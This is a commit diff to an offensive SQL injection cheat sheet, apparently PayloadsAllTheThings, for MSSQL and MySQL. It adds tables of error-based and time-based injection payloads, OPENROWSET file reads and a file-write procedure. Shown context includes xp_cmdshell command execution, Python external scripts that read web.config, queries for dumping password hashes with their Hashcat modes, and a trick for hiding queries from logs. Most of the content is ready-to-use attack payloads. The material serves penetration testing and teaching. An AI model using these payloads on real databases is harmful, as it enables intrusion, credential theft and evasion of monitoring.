SQL - File Manipulation and Error Based Injection

SQL Injection/MSSQL Injection.md

@@ -7,18 +7,19 @@
 
 * [MSSQL Default Databases](#mssql-default-databases)
 * [MSSQL Comments](#mssql-comments)
-* [MSSQL Database Credentials](#mssql-database-credentials)
 * [MSSQL Enumeration](#mssql-enumeration)
     * [MSSQL List Databases](#mssql-list-databases)
-    * [MSSQL List Columns](#mssql-list-columns)
     * [MSSQL List Tables](#mssql-list-tables)
+    * [MSSQL List Columns](#mssql-list-columns)
 * [MSSQL Union Based](#mssql-union-based)
 * [MSSQL Error Based](#mssql-error-based)
 * [MSSQL Blind Based](#mssql-blind-based)
     * [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent)
 * [MSSQL Time Based](#mssql-time-based)
 * [MSSQL Stacked Query](#mssql-stacked-query)
-* [MSSQL Read File](#mssql-read-file)
+* [MSSQL File Manipulation](#mssql-file-manipulation)
+    * [MSSQL Read File](#mssql-read-file)
+    * [MSSQL Write File](#mssql-write-file)
 * [MSSQL Command Execution](#mssql-command-execution)
     * [XP_CMDSHELL](#xp_cmdshell)
     * [Python Script](#python-script)
@@ -29,6 +30,8 @@
 * [MSSQL Privileges](#mssql-privileges)
     * [MSSQL List Permissions](#mssql-list-permissions)
     * [MSSQL Make User DBA](#mssql-make-user-dba)
+* [MSSQL Database Credentials](#mssql-database-credentials)
+* [MSSQL OPSEC](#mssql-opsec)
 * [References](#references)
 
 
@@ -49,47 +52,34 @@
 | Type                       | Description                       |
 |----------------------------|-----------------------------------|
 | `/* MSSQL Comment */`      | C-style comment                   |
-| `-- -`                     | SQL comment                       |
+| `--`                       | SQL comment                       |
 | `;%00`                     | Null byte                         |
 
 
-## MSSQL Database Credentials
-
-* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
-    ```sql
-    SELECT name, password FROM master..sysxlogins
-    SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins 
-    -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
-    ```
-* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
-    ```sql
-    SELECT name, password_hash FROM master.sys.sql_logins
-    SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
-    ```
-
-
 ## MSSQL Enumeration
 
-| Description   | SQL Query |
-| ------------- | ----------------------------------------- |
-| DBMS version  | `SELECT @@version`                        |
-| Database name | `SELECT DB_NAME()`                        |
-| Hostname      | `SELECT HOST_NAME()`                      |
-| Hostname      | `SELECT @@hostname`                       |
-| Hostname      | `SELECT @@SERVERNAME`                     |
-| Hostname      | `SELECT SERVERPROPERTY('productversion')` |
-| Hostname      | `SELECT SERVERPROPERTY('productlevel')`   |
-| Hostname      | `SELECT SERVERPROPERTY('edition')`        |
-| User          | `SELECT CURRENT_USER`                     |
-| User          | `SELECT user_name();`                     |
-| User          | `SELECT system_user;`                     |
-| User          | `SELECT user;`                            |
+| Description     | SQL Query |
+| --------------- | ----------------------------------------- |
+| DBMS version    | `SELECT @@version`                        |
+| Database name   | `SELECT DB_NAME()`                        |
+| Database schema | `SELECT SCHEMA_NAME()`                    |
+| Hostname        | `SELECT HOST_NAME()`                      |
+| Hostname        | `SELECT @@hostname`                       |
+| Hostname        | `SELECT @@SERVERNAME`                     |
+| Hostname        | `SELECT SERVERPROPERTY('productversion')` |
+| Hostname        | `SELECT SERVERPROPERTY('productlevel')`   |
+| Hostname        | `SELECT SERVERPROPERTY('edition')`        |
+| User            | `SELECT CURRENT_USER`                     |
+| User            | `SELECT user_name();`                     |
+| User            | `SELECT system_user;`                     |
+| User            | `SELECT user;`                            |
 
 
 ### MSSQL List Databases
 
 ```sql
 SELECT name FROM master..sysdatabases;
+SELECT name FROM master.sys.databases;
 
 -- for N = 0, 1, 2, …
 SELECT DB_NAME(N); 
@@ -99,36 +89,40 @@ SELECT DB_NAME(N);
 SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; 
 ```
 
-### MSSQL List Columns
-
-```sql
--- for the current DB only
-SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
-
--- list column names and types for master..sometable
-SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; 
-
-SELECT table_catalog, column_name FROM information_schema.columns
-```
-
 ### MSSQL List Tables
 
 ```sql
 -- use xtype = 'V' for views
 SELECT name FROM master..sysobjects WHERE xtype = 'U';
-
+SELECT name FROM <DBNAME>..sysobjects WHERE xtype='U'
 SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
 
 -- list column names and types for master..sometable
 SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
 
 SELECT table_catalog, table_name FROM information_schema.columns
+SELECT table_name FROM information_schema.tables WHERE table_catalog='<DBNAME>'
 
 -- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options  (Only works in MSSQL 2017+)
 SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
 ```
 
 
+### MSSQL List Columns
+
+```sql
+-- for the current DB only
+SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
+
+-- list column names and types for master..sometable
+SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; 
+
+SELECT table_catalog, column_name FROM information_schema.columns
+
+SELECT COL_NAME(OBJECT_ID('<DBNAME>.<TABLE_NAME>'), <INDEX>)
+```
+
+
 ## MSSQL Union Based
 
 * Extract databases names
@@ -166,6 +160,13 @@ SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
 
 ## MSSQL Error Based
 
+| Name         | Payload         |
+| ------------ | --------------- |
+| CONVERT      | `AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~')) -- -` |
+| IN           | `AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~')) -- -` |
+| EQUAL        | `AND 1337=CONCAT('~',(SELECT @@version),'~') -- -` |
+| CAST         | `CAST((SELECT @@version) AS INT)` |
+
 * For integer inputs
 
     ```sql
@@ -249,15 +250,31 @@ IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
     ```
 
 
-## MSSQL Read File
+## MSSQL File Manipulation
+
+### MSSQL Read File
 
 **Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.
 
+
+```sql
+OPENROWSET(BULK 'C:\path\to\file', SINGLE_CLOB)
+```
+
+Example:
+
 ```sql
 -1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
 ```
 
 
+### MSSQL Write File
+
+```sql
+execute spWriteStringToFile 'contents', 'C:\path\to\', 'file'
+```
+
+
 ## MSSQL Command Execution
 
 ### XP_CMDSHELL
@@ -268,7 +285,7 @@ EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
 EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
 ```
 
-If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
+If you need to reactivate `xp_cmdshell` (disabled by default in SQL Server 2005)
 
 ```sql
 EXEC sp_configure 'show advanced options',1;
@@ -282,7 +299,6 @@ RECONFIGURE;
 > Executed by a different user than the one using `xp_cmdshell` to execute commands
 
 ```powershell
-# Print the user being used (and execute commands)
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
@@ -401,6 +417,21 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
 ```
 
 
+## MSSQL Database Credentials
+
+* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
+    ```sql
+    SELECT name, password FROM master..sysxlogins
+    SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins 
+    -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
+    ```
+* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
+    ```sql
+    SELECT name, password_hash FROM master.sys.sql_logins
+    SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+    ```
+
+
 ## MSSQL OPSEC
 
 Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`

SQL Injection/MySQL Injection.md

@@ -69,7 +69,7 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server
 | `/* MYSQL Comment */`      | C-style comment                   |
 | `/*! MYSQL Special SQL */` | Special SQL                       |
 | `/*!32302 10*/`            | Comment for MYSQL version 3.23.02 |
-| `-- -`                     | SQL comment                       |
+| `--`                       | SQL comment                       |
 | `;%00`                     | Nullbyte                          |
 | \`                         | Backtick                          |
 
@@ -229,6 +229,17 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE
 
 ## MYSQL Error Based
 
+| Name         | Payload         |
+| ------------ | --------------- |
+| GTID_SUBSET  | `AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337) -- -` |
+| JSON_KEYS    | `AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8))) -- -` |
+| EXTRACTVALUE | `AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -` |
+| UPDATEXML    | `AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -` |
+| EXP          | `AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x)) -- -` |
+| OR           | `OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0) -- -` |
+| NAME_CONST   | `AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--` |
+
+
 ### MYSQL Error Based - Basic
 
 Works with `MySQL >= 4.1`
@@ -373,6 +384,8 @@ The following SQL codes will delay the output from MySQL.
     RLIKE SLEEP([SLEEPTIME])
     OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
     XOR(IF(NOW()=SYSDATE(),SLEEP(5),0))XOR
+    AND SLEEP(10)=0
+    AND (SELECT 1337 FROM (SELECT(SLEEP(10-(IF((1=1),0,10))))) RANDSTR)
     ```
 
 ### Using SLEEP in a Subselect
@@ -662,12 +675,19 @@ mysql> SELECT @@version;
 | 5.6.31-0ubuntu0.15.10.1 |
 +-------------------------+
 
-mysql> mysql> SELECT version();
+mysql> SELECT version();
 +-------------------------+
 | version()               |
 +-------------------------+
 | 5.6.31-0ubuntu0.15.10.1 |
 +-------------------------+
+
+mysql> SELECT @@GLOBAL.VERSION;
++------------------+
+| @@GLOBAL.VERSION |
++------------------+
+| 8.0.27           |
++------------------+
 ```